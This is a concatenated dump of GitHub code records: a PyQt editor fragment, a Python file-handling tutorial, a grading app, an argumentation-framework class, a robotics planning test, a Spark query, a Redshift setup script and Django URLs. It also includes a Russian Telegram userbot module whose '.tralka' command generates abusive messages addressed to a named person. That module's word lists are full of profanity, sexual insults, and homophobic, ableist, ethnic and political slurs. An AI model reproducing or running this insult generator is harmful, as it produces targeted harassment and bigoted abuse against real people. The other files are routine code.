\"Open\", self)\n loadAct.setStatusTip('Open python file')\n loadAct.setShortcut('Ctrl+O')\n loadAct.triggered.connect(self.handleLoad)\n\n exitAct = qtw.QAction(QIcon('exit24.png'), 'Exit', self)\n exitAct.setShortcut('Ctrl+Q')\n exitAct.setStatusTip('Exit application')\n exitAct.triggered.connect(self.close)\n fileMenu.addAction(saveAct)\n fileMenu.addAction(saveAsAct)\n fileMenu.addAction(loadAct)\n fileMenu.addAction(exitAct)\n\n commentAct = qtw.QAction(QIcon(''), \"Comment block\", self)\n commentAct.setStatusTip('Comment line')\n commentAct.setShortcut('Ctrl+/')\n commentAct.triggered.connect(self.handleComment)\n\n importsAct = qtw.QAction(QIcon(''), \"Edit imports\", self)\n importsAct.setStatusTip('Change which modules are imported')\n importsAct.triggered.connect(self.editImports)\n editMenu.addAction(commentAct)\n\n def setMessage(self, log):\n print(\"Setting message\", log)\n self.statusBar().showMessage(log)\n\n def handleStyleChanged(self, style):\n self.parent.setStyle(style)\n\n def handleSave(self):\n print(\"TODO save\")\n\n def handleSaveAs(self):\n print(\"TODO save as\")\n\n def handleLoad(self):\n 
print(\"TODO load\")\n\n def handleComment(self):\n print(\"TODO comment\")\n\n def editImports(self):\n print(\"TODO imports\")\n\n def closeEvent(self, event):\n self.data.stopVid()\n event.accept() # let the window close\n","repo_name":"frewes/ocvid","sub_path":"App.py","file_name":"App.py","file_ext":"py","file_size_in_byte":3452,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"21876797142","text":"# огромное спасибо за скрипт https://github.com/PSPshnik\n#.tralka <кол-во слов> <Сколько капса(в %)> <Имя обидчика>\nfrom .. import loader, utils\nimport logging\nimport random\n\nversion = 4.8\nsentence_min = 3\nsentence_max = 10\n# paragraph_min = 10\n# paragraph_max = 20\nprint_length = False\n\nm = ['некультурный', 'необразованный',\n 'гороховый', 'мудовый', 'глупенький',\n 'малолетний', 'ебучий', 'гнилой',\n 'собачий', 'ссаный', 'моржовый',\n 'вредный', 'прибабахнутый', 'ебаный',\n 'волшебный', 'сказочный', 'маленький',\n 'приёмный', 'сральный', 'пердёжный',\n 'обоссанный', 'обосранный', 'чёртов',\n 'грязный', 'тупой', 'нищий', 'родной', 'мусорный',\n 'дегенеративный',\n 'распроклятый', 'турецкий', 'блядский',\n 'ёбаный', 'хуев', 'хуёвый', 'ебанутый',\n 'ёбнутый', 'грязный', 'зелёный', 'сукин',\n 'лысый', 'пожилой', 'вонючий', 'чокнутый']\n\nf = ['некультурная', 'необразованная',\n 'гороховая', 'мудовая', 'глупенькая',\n 'малолетняя', 'ебучая', 'гнилая',\n 'собачья', 'ссаная', 'моржовая',\n 'вредная', 'прибабахнутая', 'ебаная',\n 'волшебная', 'сказочная', 'маленькая',\n 'приёмная', 'сральная', 'пердёжная',\n 'обоссанная', 'обосранная', 'чёртова',\n 'грязная', 'тупая', 'нищая',\n 'родная', 'мусорная', 'дегенеративная',\n 'распроклятая', 'турецкая', 'блядская',\n 'ёбаная', 'хуева', 'хуёвая', 'ебанутая',\n 'ёбнутая', 'грязная', 'зелёная', 'сукина',\n 'лысая', 'пожилая', 'вонючая', 'чокнутая']\n\ns = ['некультурное', 'необразованное',\n 'гороховое', 'мудовое', 'глупенькое',\n 'малолетнее', 'ебучее', 'гнилое',\n 'собачье', 'ссаное', 'моржовое',\n 'вредное', 'прибабахнутое', 'ебаное',\n 'волшебное', 'сказочное', 'маленькое',\n 'приёмное', 'сральное', 'пердёжное',\n 'обоссанное', 'обосранное', 'чёртово', 'грязное',\n 'тупое', 'нищее', 'родное', 'мусорное', 'дегенеративное',\n 'распроклятое', 'турецкое', 'блядское',\n 'ёбаное', 'хуево', 'хуёвое', 'ебанутое',\n 'ёбнутое', 'грязное', 'зелёное', 'сукино',\n 'лысое', 'пожилое', 'вонючее', 'чокнутое']\n\nk = ['из жопы', 'в ловушке', 'в бане',\n 'на хуе', 'в дурке', 'из стула', 'в дурке ебаной',\n 'в хуипе', 'в запечатанной колоде']\n\nn = ['негра', 'джокера', 'тупого говна', 'хуйни ебаной',\n 'хуя', 'феминизма', 'говна',\n 'от народа', 'хуйни', 'Навального',\n 'ловушкера', 'Путина', 'русского народа', 'вонючки', 'с функцией жопа']\n\no = ['пиздец', 'блять', 'попался в ловушку',\n 'тебя забайтили', 'ловушка джокера', 'тебе бан',\n 'фак ю', 'убейся', 'соси',\n 'ёбаный твой рот', 'срал я на тебя',\n 'убейся об стену', 'соси пизду', 'у тебя хуй вместо носа',\n 'купи мою подписку на ютубе',\n 'хуй соси', 'губой тряси', 'я съел деда',\n 'насрал в пизду',\n '22 июня 1642 года Карл Первый поднял королевский штандарт (королевский флаг), что по английским традициям означало объявление войны',\n 'мне этот мир абсолютно понятен',\n 'я был на этой планете бесконечным множеством',\n 'но тебе этого не понять',\n 'иди преисполняться в гранях каких-то',\n 'пиздуй - бороздуй',\n 'бредишь', 'вот я какну и смываю, и ты так делай',\n 'не надо шутить с войной',\n 'твою дочку ебут', 'залупаешься',\n 'хули ты 
пиздишь', 'поцелуй лошадиную сраку',\n 'распронаёб тебя', 'ъеь', 'ьуь', 'аье',\n 'какого хуя они в другом порядке разложены',\n 'ай фак ю булщит щит',\n 'он за углом сидит и тебе на голову дрочит',\n 'армяне в нарды играют', 'жирняк гай',\n 'иди сюда, попробуй меня трахнуть, я тебя сам трахну',\n 'что ты там делаешь', 'беги за горизонт',\n 'попал в дурку ебаную', 'был бы ты человек', 'нахуй',\n 'запомни', 'хули ты сюда лезешь',\n 'высрана твоя морда', 'возьми салфетку',\n 'я бы никому не проиграл',\n 'иди нахуй', 'иди',\n 'я тебя ебал, гад, срать на нас говна',\n 'я тебя ебал гадить нас срать так',\n 'держи в курсе', 'несёшь хуйню какую-то',\n 'русские вперёд']\n\nd = ['бекон', 'сыр', 'пенис', 'член',\n 'мудозвон', 'лицемер', 'лжец',\n 'хуй', 'гомогей', 'чай', 'рукоблуд',\n 'долбан', 'пидорас', 'сын', 'козёл',\n 'газ', 'фашист', 'пососатель',\n 'дегенерат', 'спермобак', 'долбоёб',\n 'клоун', 'паразит', 'письколёт',\n 'мудак', 'спидозник', 'пудж', 'кремлебот',\n 'объебос', 'дурачок', 'хуебес', 'пиздолёт',\n 'педик', 'педик - медведик', 'дебил', 'дифичент',\n 'кок сакер', 'пиздабол', 'аутист', 'гадёныш', 'выблядок',\n 'глиномес', 'даун', 'хер', 'булщит', 'засранец',\n 'инвалид', 'дурак', 'болван',\n 'минетчик', 'онанист', 'напёрдыш',\n 'чилипиздрик', 'пиздюк', 'гей', 'ловушкер',\n 'пендос', 'наркоман', 'алкаш', 'жиробас',\n 'рак', 'укурок', 'крокодил', 'ебальник',\n 'секс-раб', 'потомок', 'дрыщ',\n 'урод', 'карлик', 'дед инсайд', 'волк',\n 'калыван', 'либераст', 'шакал',\n 'педофил', 'бомж', 'пингвин', 'жираф',\n 'огурец', 'салат', 'лук', 'картофель',\n 'деградант', 'спам', 'человек', 'гуманитарий',\n 'язык', 'стол', 'PEP-8', 'ебалай', 'враг', 'недруг', 'супостат',\n 'кретин', 'козолуп', 'свинарь',\n 'униженец', 'опущенец', 'муравей',\n 'дятел', 'козёл', 'жирняк', 'говноед',\n 'чёрт', 'суслик', 'идиот', 'жлоб', 'мерзавец',\n 'негодяй', 'подлец', 'ублюдок', 'гад',\n 'гавкошмыг', 'чикибамбонатор', 'чикибамбог',\n 'джокер', 'жмых', 'жмышок', 'жмышонок',\n 'куколд', 'ебалай', 'ушлёпок',\n 'хуесос', 'членосос', 'чикибамбонёнок',\n 'чикибан', 'чикибомбастер', 'чайник',\n 'чикибамбонизатор', 'чикибамбог']\n\ndd = ['куколда', 'хуйолда', 'мудила', 'блядина', 'гнида',\n 'пидрила', 'тварь', 'сука', 'сперма', 'пидорасина',\n 'либераха', 'срака', 'жопа', 'петушара', 'залупа',\n 'хуета', 'пупа', 'петька', 'блядь', 'елда', 'тряпка',\n 'яма', 'хуемразь', 'срань', 'мошонка', 'ссанина',\n 'вагина', 'пизда', 'пососательница',\n 'ловушка', 'паста', 'макаронина',\n 'жиробасина', 'радфемка', 'шлюха', 'прошмандовка',\n 'жируха', 'доска', 'уродина',\n 'плоскодонка', 'скотина', 'омега',\n 'черешня', 'ватрушка', 'шишка',\n 'ракушка', 'свинья', 'какашка',\n 'гнилушка', 'лягушка', 'свинушка',\n 'картошка', 'волчара', 'дочь', 'пешка',\n 'давалка', 'пососательница',\n 'колбаса', 'собака', 'мохнатка', 'жижа',\n 'какашка', 'какуля', 'душа', 'вражина',\n 'падла', 'болезнь', 'бумажка', 'вонючка',\n 'тень', 'гадина', 'чикибамбони',\n 'микробамбони', 'мышь', 'мразь',\n 'мразина', 'мразота']\n\nddd = ['удобрение', 'уёбище', 'ебло', 'хуйло',\n 'чудище', 'говно', 'яблоко', 'животное',\n 'дерьмо', 'блядотище', 'дитя', 'порождение',\n 'очко', 'растение', 'ебало', 'ведро',\n 'мудило', 'хуепучило']\n\ngens = ['03', '14', '25', '8',\n '06', '16', '26', '30',\n '41', '52', '303', '330', '0',\n '414', '441', '1', '8',\n '525', '552', '2', '067',\n '167', '267', '306', '416',\n '526', '07', '8', '8', '8',\n '17', '27', '8', '8', '8',\n '307', '417', '527', '8', '8',\n '3067', '4167', '5267']\n\narray = [d, dd, ddd, m, f, s, k, n, 
o]\n\n\ndef generate(word_count: int, caps_rate: int, name: str):\n    res = []\n    priv = ''\n    if name:\n        priv += f'Привет, {name}! '\n    caps_rate %= 100\n    priv += 'Ты, '\n    word_count_now = 0\n    while word_count_now < word_count:\n        tempi = word_count + 1  # sentinel so the inner loop runs at least once\n        # re-sample a phrase until it fits into the remaining word budget\n        while word_count_now + tempi > word_count:\n            random.seed()\n            y = random.choice(gens)\n            x = []\n            for j in y:\n                x.append(random.choice(array[int(j)]))\n            x = ' '.join(x)\n            tempi = len(x.split())\n        res.append(x)\n        word_count_now += tempi\n    res = ', '.join(res)\n    res = res.split()\n    count = 0\n    kek = random.randint(sentence_min, sentence_max)\n    for v in range(len(res)):\n        if res[v].endswith(','):\n            count += 1\n            if count % kek == 0:\n                count = 0\n                random.seed()\n                kek = random.randint(sentence_min, sentence_max)\n                res[v] = res[v][:-1] + '.'\n                if v < len(res) - 1:\n                    res[v + 1] = res[v + 1][0].upper() + res[v + 1][1:]\n    res[0] = priv + res[0]\n    res = ' '.join(res).split()\n    for v in range(len(res)):\n        random.seed()\n        z = random.randint(0, 99)\n        if z < caps_rate:\n            res[v] = res[v].upper()\n    return ' '.join(res) + '.'\n# IS ANYONE STILL READING THIS?\n\n\nlogger = logging.getLogger(__name__)\n\n\ndef register(cb):\n    cb(Tralka())\n\n\nclass Tralka(loader.Module):\n    \"\"\"Generates pastes\"\"\"\n\n    def __init__(self):\n        self.name = _(\"Pastes\")\n        self._me = None\n        self._ratelimit = []\n\n    async def client_ready(self, client, db):\n        self._db = db\n        self._client = client\n        self._me = await client.get_me()\n\n    async def tralkacmd(self, message):\n        \"\"\".tralka <word count> <caps percent> <offender name>\"\"\"\n        args = utils.get_args(message)\n        chatid = str(message.chat_id)\n        if len(args) < 2:\n            await utils.answer(message, \"Проверь, ты всё указал правильно?\")\n        elif len(args) == 2:\n            await utils.answer(message, generate(int(args[0]), int(args[1]), None))\n        else:\n            await utils.answer(message, generate(int(args[0]), int(args[1]), args[2]))\n","repo_name":"AivenGog/ftg-modules","sub_path":"obzivalka.py","file_name":"obzivalka.py","file_ext":"py","file_size_in_byte":13148,"program_lang":"python","lang":"ru","doc_type":"code","stars":21,"dataset":"github-code","pt":"40"}
+{"seq_id":"38975642265","text":"#! 
/usr/bin/python\n\nfile_name = \"data.txt\"\n\n# open(file, mode='r', buffering=-1, encoding=None, errors=None, newline=None, closefd=True, opener=None)\nf = open(file_name)\t\t\t\t\t# f is file object\nf = open(file_name, \"rt\")\t\t\t# The same, \"rt\" means 'read text'\nf.close()\n\ntry:\n\tf = open(file_name, \"rt\")\n\ttext = f.read(20);\t\t\t\t# Read at most 20 characters ('text' instead of 'str' to avoid shadowing the builtin)\nfinally:\n\tf.close();\nprint(text)\n\n# Equivalent to previous, except f.read()\nwith open(file_name, \"rt\") as f:\t# 'With' statement context manager\n\ttext = f.read();\t\t\t\t\t# Read entire file\n\t# f is closed here\nprint(text)\n\nwith open(file_name, \"rt\") as f:\t# f = open(file_name) is the same\n\tline1 = f.readline()\t\t\t# Read one line including '\\\\n'\n\tline2 = f.readline()\nprint(line1, line2, sep='')\n\nwith open(file_name, \"rt\") as f:\n\tlines = f.readlines();\nprint(lines)\nprint()\n\nf = open(file_name)\ncount = 0\nfor line in f:\t\t\t\t\t\t# For loop with file object\n\tcount += 1\n\tprint(count, \") \", line, sep='', end='')\nf.close()\nprint()\n\nf = open(\"new_data.txt\", \"wt\")\nf.write(\"First line\\n\");\t\t\t# No '\\n' automatically at the end of line\nf.write(\"Second line\\n\");\nli = [\"aaa\\n\", \"bbb\\n\", \"ccc\"]\t\t# No '\\n' automatically at the end of each line\nf.writelines(li)\nf.close()\n\nnums = [50, 60, 70, 80, 90]\t\t\t# Bytes only\nbarr = bytearray(nums)\noutf = open(\"data.bin\", \"wb\")\t# \"wb\" means 'write binary'\noutf.write(barr)\noutf.close()\n\ninf = open(\"data.bin\", \"rb\")\nli = list(inf.read())\nprint(li)\n","repo_name":"oleg0x/Python_model_examples","sub_path":"files.py","file_name":"files.py","file_ext":"py","file_size_in_byte":1419,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"}
+{"seq_id":"24353049738","text":"student_list = []\n# Now integrating to Git\n\nclass Student(object):\n\n    def __init__(self, name):\n        self.name = name\n        self.marks = []\n\n    def average_mark(self):\n        divisor = len(self.marks)\n        if divisor == 0:\n            return 0\n        total = sum(self.marks)\n        return total / divisor\n\n\ndef create_student():\n    name = input(\"Please enter the student's name: \")\n    return Student(name)\n\n\ndef append_mark(student, mark):\n    student.marks.append(mark)\n\n\ndef print_student_details(student):\n    print(\"student's name \", student.name)\n    print(\"student's average \", student.average_mark())\n\n\ndef print_student_list(students):\n    for i, student in enumerate(students):\n        print(\"ID: {}\".format(i))\n        print_student_details(student)\n\n\ndef menu():\n    selection = input(\"Enter 'p' to print the student's list, \"\n                      \"'s' to add a new student, \"\n                      \"'a' to add a mark to a student, or \"\n                      \"'q' to quit: \")\n    while selection != 'q':\n\n        if selection == 'p':\n            print_student_list(student_list)\n        elif selection == 's':\n            student = create_student()\n            student_list.append(student)\n        elif selection == 'a':\n            print_student_list(student_list)\n            student_id = int(input(\"enter the student ID to add a mark to: \"))\n            student = student_list[student_id]\n            mark = int(input(\"Enter the new mark to be added: \"))\n            append_mark(student, mark)\n\n        selection = input(\"Enter 'p' to print the student's list, \"\n                          \"'s' to add a new student, \"\n                          \"'a' to add a mark to a student, or \"\n                          \"'q' to quit \")\n\n\nmenu()\n","repo_name":"demxic/Grading-System","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1764,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"}
+{"seq_id":"28607440852","text":"import alias as al\n\nclass Argument(object):\n \n def __init__(self, name, framework):\n self.name = name\n self.framework = framework\n self.attacks = set()\n self.attacksref = set()\n\n def __repr__(self):\n return '\\'' + self.name + '\\''\n\n def __str__(self):\n string = 'Argument \\'' + self.name + '\\' : ['\n atts = []\n for att in self.attacks:\n atts.append('\\'' + att.name + '\\'')\n string = string + (', '.join(atts))\n string = string + ']'\n return string\n\n def __iter__(self):\n for arg in self.attacks:\n yield arg\n\n def __getitem__(self,arg):\n if arg in self.attacks:\n return self.framework[arg]\n else:\n raise al.FrameworkException('Argument \\'%s\\' is not attacked by argument \\'%s\\'' %(arg, self.name))\n\n def add_attack(self, arg):\n if isinstance(arg, al.Argument):\n self.attacks.add(arg)\n self.attacksref.add(arg.name)\n elif isinstance(arg, basestring):\n self.attacks.add(self.framework[arg])\n self.attacksref.add(arg)\n\n def remove_attack(self, arg):\n if isinstance(arg, al.Argument):\n self.attacks.remove(arg)\n self.attacksref.remove(arg.name)\n elif isinstance(arg, basestring):\n self.attacks.remove(self.framework[arg])\n self.attacksref.remove(arg)\n\n # Determines whether the argument is legally in within a given labelling\n def is_legally_in(self, labelling):\n if not (labelling.framework.argument_exists(self.name)):\n raise ArgumentException(\"Argument does not exist in this framework/labelling.\")\n if self.name not in labelling.inargs:\n raise al.LabellingException(\"Argument is not labelled in.\")\n allout = True\n for att in labelling.framework.get_attackers(self.name):\n if att in labelling.inargs:\n allout = False\n break\n if att in labelling.undecargs:\n allout = False\n break\n return allout\n\n # Determines whether the argument is legally out within a given labelling\n def is_legally_out(self, labelling):\n if not (labelling.framework.argument_exists(self.name)):\n raise ArgumentException(\"Argument does not exist in this framework/labelling.\")\n if self.name not in labelling.outargs:\n raise al.LabellingException(\"Argument is not labelled out.\")\n\n onein = False\n for att in labelling.framework.get_attackers(self.name):\n if att in labelling.inargs:\n onein = True\n break\n\n return onein\n\n # Determines whether the argument is legally undecided within a given labelling\n def is_legally_undec(self, labelling):\n if not (labelling.framework.argument_exists(self.name)):\n raise ArgumentException(\"Argument does not exist in this framework/labelling.\")\n if self.name not in labelling.undecargs:\n raise al.LabellingException(\"Argument is not labelled undecided.\")\n\n allout = True\n onein = False\n\n for att in labelling.framework.get_attackers(self.name):\n if att not in labelling.outargs:\n allout = False\n if att in labelling.inargs:\n onein = True\n break\n\n return not (allout | onein)\n\n def is_illegally_in(self, labelling):\n return not self.is_legally_in(labelling)\n\n def is_illegally_out(self, labelling):\n return not self.is_legally_out(labelling)\n\n def is_illegally_undec(self, labelling):\n return not self.is_legally_undec(labelling)\n\n def is_super_illegally_in(self, labelling):\n if not (labelling.framework.argument_exists(self.name)):\n raise ArgumentException(\"Argument does not exist in this framework/labelling.\")\n if self.name not in labelling.inargs:\n raise al.LabellingException(\"Argument is not labelled in.\")\n\n sii = False\n if self.is_illegally_in(labelling):\n for att in 
labelling.framework.get_attackers(self.name):\n if att in labelling.inargs:\n if labelling.framework.get_arg_obj(att).is_legally_in(labelling):\n sii = True\n break\n if att in labelling.undecargs:\n if labelling.framework.framework[att].is_legally_undec(labelling):\n sii = True\n break\n\n return sii \n","repo_name":"alias-org/alias","sub_path":"alias/classes/argument.py","file_name":"argument.py","file_ext":"py","file_size_in_byte":4602,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"16665675347","text":"from pathlib import Path\n\nfrom publish.document import doc_text\nfrom publish.publication import get_pub\n\n\n# def test_blog_images():\n# return verify_blog_images()\n\n\n# def test_book_images():\n# return verify_book_images()\n\n\n# def test_course_images():\n# return verify_course_images()\n\n\n# def test_textbook_images():\n# return verify_textbook_images()\n\n\ndef test_image_pages():\n doc_path = Path(f\"Documents/Shrinking-World-Pubs/journey/Pub\")\n pub = get_pub('journey')\n # settings = read_json(pub_json_path(pub.name, pub.doc_path))\n # settings = read_json(\"static/js/journey.json\")\n image_path = pub.image_path\n return doc_text(doc_path / \"JFK.md\", image_path) + doc_text(\n doc_path / \"MushroomCloud.md\", image_path\n )\n","repo_name":"Mark-Seaman/GhostWriter","sub_path":"probe/probe_images.py","file_name":"probe_images.py","file_ext":"py","file_size_in_byte":758,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"40"} +{"seq_id":"73434441079","text":"import unittest, time, main\n\nimport numpy as np\n\nfrom opentamp.core.parsing import parse_domain_config, parse_problem_config\nfrom opentamp.pma import hl_solver, robot_ll_solver\nfrom opentamp.policy_hooks import policy_solver, tamp_agent, policy_hyperparams, policy_solver_utils\n\ndef load_environment(domain_file, problem_file):\n domain_fname = domain_file\n d_c = main.parse_file_to_dict(domain_fname)\n domain = parse_domain_config.ParseDomainConfig.parse(d_c)\n p_fname = problem_file\n p_c = main.parse_file_to_dict(p_fname)\n problem = parse_problem_config.ParseProblemConfig.parse(p_c, domain)\n params = problem.init_state.params\n return domain, problem, params\n\ndef traj_retiming(plan, velocity):\n baxter = plan.params['baxter']\n rave_body = baxter.openrave_body\n body = rave_body.env_body\n lmanip = body.GetManipulator(\"left_arm\")\n rmanip = body.GetManipulator(\"right_arm\")\n left_ee_pose = []\n right_ee_pose = []\n for t in range(plan.horizon):\n rave_body.set_dof({\n 'lArmPose': baxter.lArmPose[:, t],\n 'lGripper': baxter.lGripper[:, t],\n 'rArmPose': baxter.rArmPose[:, t],\n 'rGripper': baxter.rGripper[:, t]\n })\n rave_body.set_pose([0,0,baxter.pose[:, t]])\n\n left_ee_pose.append(lmanip.GetTransform()[:3, 3])\n right_ee_pose.append(rmanip.GetTransform()[:3, 3])\n time = np.zeros(plan.horizon)\n # import ipdb; ipdb.set_trace()\n for t in range(plan.horizon-1):\n left_dist = np.linalg.norm(left_ee_pose[t+1] - left_ee_pose[t])\n right_dist = np.linalg.norm(right_ee_pose[t+1] - right_ee_pose[t])\n time_spend = max(left_dist, right_dist)/velocity[t]\n time[t+1] = time_spend\n return time\n\n# Useful for creating sample plans\ndef get_random_cloth_init_poses(num_cloths, table_pos):\n cur_xy = [-.25, -.525]\n cloth_poses = []\n for i in range(num_cloths):\n if not (i+1) % 4:\n cur_xy = np.array(cur_xy) + np.array([np.random.uniform(-0.4, -0.5), np.random.uniform(0.1, 0.15)])\n cur_xy[0] = 
max(cur_xy[0], -.25)\n else:\n cur_xy = np.array(cur_xy) + np.array([np.random.uniform(0.1, 0.15), np.random.uniform(-0.025, 0.025)])\n pos = np.array(table_pos) + np.array([cur_xy[0], cur_xy[1], 0.05])\n cloth_poses.append(pos.tolist())\n return cloth_poses\n\ndef get_random_cloth_init_pose(table_pos):\n cur_xy = np.array([np.random.uniform(-0.2, 0.1), np.random.uniform(0.1, 0.5)])\n pos = np.array(table_pos) + np.array([cur_xy[0], cur_xy[1], 0.05])\n return pos\n\n# Useful for creating sample plans\ndef get_random_cloth_end_poses(num_cloths, basket_init_pos):\n cur_xy = [-.11, .11]\n cloth_poses = []\n for i in range(num_cloths):\n if not (i+1) % 4:\n cur_xy = np.array(cur_xy) + np.array([np.random.uniform(-0.21, -0.23), np.random.uniform(0.045, 0.055)])\n cur_xy[0] = max(cur_xy[0], -.11)\n else:\n cur_xy = np.array(cur_xy) + np.array([np.random.uniform(0.045, 0.055), np.random.uniform(-0.01, 0.01)])\n pos = np.array(basket_init_pos) + np.array([cur_xy[0], cur_xy[1], 0.04])\n cloth_poses.append(pos.tolist())\n return cloth_poses\n\n\nclass TestPolicySolver(unittest.TestCase):\n def test_policy_solver(self):\n domain_fname = '../domains/laundry_domain/laundry.domain'\n d_c = main.parse_file_to_dict(domain_fname)\n domain = parse_domain_config.ParseDomainConfig.parse(d_c)\n hls = hl_solver.FFSolver(d_c)\n print(\"loading laundry problem...\")\n p_c = main.parse_file_to_dict('../domains/laundry_domain/laundry_probs/single_cloth_policy.prob')\n\n plans = []\n\n ll_solver = robot_ll_solver.RobotLLSolver()\n\n for i in range(50):\n\n plan_str = [\n '1: MOVETO BAXTER ROBOT_INIT_POSE CLOTH_GRASP_BEGIN_0',\n '2: CLOTH_GRASP BAXTER CLOTH_0 CLOTH_TARGET_BEGIN_0 CLOTH_GRASP_BEGIN_0 CG_EE_0 CLOTH_GRASP_END_0',\n '3: MOVEHOLDING_CLOTH BAXTER CLOTH_GRASP_END_0 CLOTH_PUTDOWN_BEGIN_0 CLOTH_0',\n '4: PUT_INTO_BASKET BAXTER CLOTH_0 BASKET CLOTH_TARGET_END_0 END_TARGET CLOTH_PUTDOWN_BEGIN_0 CP_EE_0 CLOTH_PUTDOWN_END_0',\n '5: MOVETO BAXTER CLOTH_PUTDOWN_END_0 ROBOT_END_POSE'\n ]\n\n ## Use this if multiple cloths in the plan\n # for i in range(1, 20):\n # plan_str.append('{0}: MOVETO BAXTER CLOTH_PUTDOWN_END_{1} CLOTH_GRASP_BEGIN_{2}'.format((i-1)*3+1, i-1, i))\n # plan_str.append('{0}: CLOTH_GRASP BAXTER CLOTH_{1} CLOTH_TARGET_BEGIN_{2} CLOTH_GRASP_BEGIN_{3} CG_EE_{4} CLOTH_GRASP_END_{5}'.format((i-1)*3+2, i, i, i, i, i))\n # plan_str.append('{0}: CLOTH_PUTDOWN BAXTER CLOTH_{1} CLOTH_TARGET_END_{2}, CLOTH_PUTDOWN_BEGIN_{3} CP_EE_{4} CLOTH_PUTDOWN_END_{5}'.format((i-1)*3+3, i, i, i, i, i))\n\n problem = parse_problem_config.ParseProblemConfig.parse(p_c, domain)\n random_pose = get_random_cloth_init_pose(problem.init_state.params['table'].pose[:,0])\n problem.init_state.params['cloth_target_begin_0'].value[:,0] = random_pose\n problem.init_state.params['cloth_0'].pose[:,0] = random_pose\n\n plan = hls.get_plan(plan_str, domain, problem)\n result = ll_solver.backtrack_solve(plan)\n if not result:\n continue\n plan.time = np.ones((1, plan.horizon))\n baxter = plan.params['baxter']\n cloth = plan.params['cloth_0']\n basket = plan.params['basket']\n table = plan.params['table']\n plan.dX, plan.state_inds, plan.dU, plan.action_inds = policy_solver_utils.get_plan_to_policy_mapping(plan, x_params=[baxter, cloth, basket, table], \\\n u_attrs=set(['lArmPose', 'lGripper', 'rArmPose', 'rGripper']))\n plans.append(plan)\n\n solver = policy_solver.BaxterPolicySolver()\n solver.train_policy(plans)\n import ipdb; 
ipdb.set_trace()\n","repo_name":"Algorithmic-Alignment-Lab/openTAMP","sub_path":"opentamp/test/test_policy_hooks/test_policy_solver.py","file_name":"test_policy_solver.py","file_ext":"py","file_size_in_byte":6198,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"40"}
+{"seq_id":"29594431442","text":"l = lineitem.filter(\"l_returnflag == 'R' \")\no = orders.filter(\"o_orderdate >= '1994-11-01' \").filter(\"o_orderdate < '1995-02-01'\")\noc = o.join(customer, o.O_CUSTKEY == customer.C_CUSTKEY)\nocn = oc.join(nation, oc.C_NATIONKEY == nation.N_NATIONKEY)\n\ntemp = ocn.join(l, l.L_ORDERKEY == ocn.O_ORDERKEY)\ntemp2 = temp.select('C_CUSTKEY', 'C_NAME', (temp.L_EXTENDEDPRICE * (1 - temp.L_DISCOUNT)).alias(\"VOLUME\"), 'C_ACCTBAL',\n                    'N_NAME', 'C_ADDRESS', 'C_PHONE', 'C_COMMENT')\nresult = temp2.groupBy('C_CUSTKEY', 'C_NAME', 'C_ACCTBAL', 'N_NAME', 'C_ADDRESS', 'C_COMMENT', 'C_PHONE').agg(\n    func.sum(\"VOLUME\").alias(\"REVENUE\")).limit(10)\nresult.show()\n","repo_name":"gharghashe/tpc-benchmark","sub_path":"OLAP/spark/query/q (10).py","file_name":"q (10).py","file_ext":"py","file_size_in_byte":674,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"}
+{"seq_id":"10057491218","text":"import configparser\nimport psycopg2\nfrom sql_queries import create_table_queries, drop_table_queries\n\n\ndef drop_tables(cur, conn):\n    \"\"\"Drop existing tables to avoid duplicate records on re-runs\n    \n    cur : cursor to perform database operations\n    conn : establish a connection to the database\n    \"\"\"\n    for query in drop_table_queries:\n        cur.execute(query)\n        conn.commit()\n\n\ndef create_tables(cur, conn):\n    \"\"\"Executes queries to create the tables in the database\n    \n    cur : cursor to perform database operations\n    conn : establish a connection to the database\n    \"\"\"\n    for query in create_table_queries:\n        cur.execute(query)\n        conn.commit()\n\n\ndef main():\n    \"\"\"Read AWS configuration parameters and create staging, fact and dimension tables \"\"\"\n    \n    config = configparser.ConfigParser()\n    config.read('dwh.cfg')\n\n    conn = psycopg2.connect(\"host={} dbname={} user={} password={} port={}\".format(*config['CLUSTER'].values()))\n    cur = conn.cursor()\n\n    # drop tables first to clean previous data from other tests\n    drop_tables(cur, conn)\n    # create staging, fact and dimension tables\n    create_tables(cur, conn)\n\n    conn.close()\n\n\nif __name__ == \"__main__\":\n    main()","repo_name":"aliescont/Data_warehouse","sub_path":"create_tables.py","file_name":"create_tables.py","file_ext":"py","file_size_in_byte":1213,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"}
+{"seq_id":"15504800551","text":"from django.urls import path\nfrom products import views\n\nurlpatterns = [\n    path(\"\", views.index, name=\"Products\"),\n    path(\"trending/\", views.trending, name=\"Trending\"),\n    path(\"new/\", views.new, name=\"New\"),\n    path(\"contact/\", views.contact, name=\"Contact\"),\n    path(\"products/\", views.products, name=\"Products\"),\n    path(\"purchase/\", views.purchase, name=\"Purchase\"),\n    path(\"products/leds/\", views.leds, name=\"LED\"),\n    path(\"products/mobiles/\",views.mobiles,name='Mobile'),\n    
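# comment added (not in the original): the name= arguments let templates reverse these URLs with {% url %}\n    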
path(\"products/laptops/\",views.laptops,name=\"Laptop\"),\n\n\n]\n","repo_name":"anmolbaunthiyal/Electronic-Website","sub_path":"products/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":586,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"29277105588","text":"import tensorflow as tf\nimport numpy as np\nimport itertools\nimport prepare_image\nfrom scipy.special import expit\nfrom sklearn.metrics import f1_score, accuracy_score, precision_score, \\\n recall_score, roc_auc_score, confusion_matrix, average_precision_score\nimport matplotlib.pyplot as plt\nimport scikitplot as skplt\nimport sklearn\nfrom PIL import Image\nfrom sklearn.metrics import precision_recall_curve\n\n\ndef softmax(x):\n \"\"\"Compute softmax values for each sets of scores in x.\"\"\"\n e_x = np.exp(x - np.max(x))\n return e_x / e_x.sum(axis=0)\n\n\ndef tf_accuracy(predict_data, test_data):\n predict = tf.constant(predict_data, 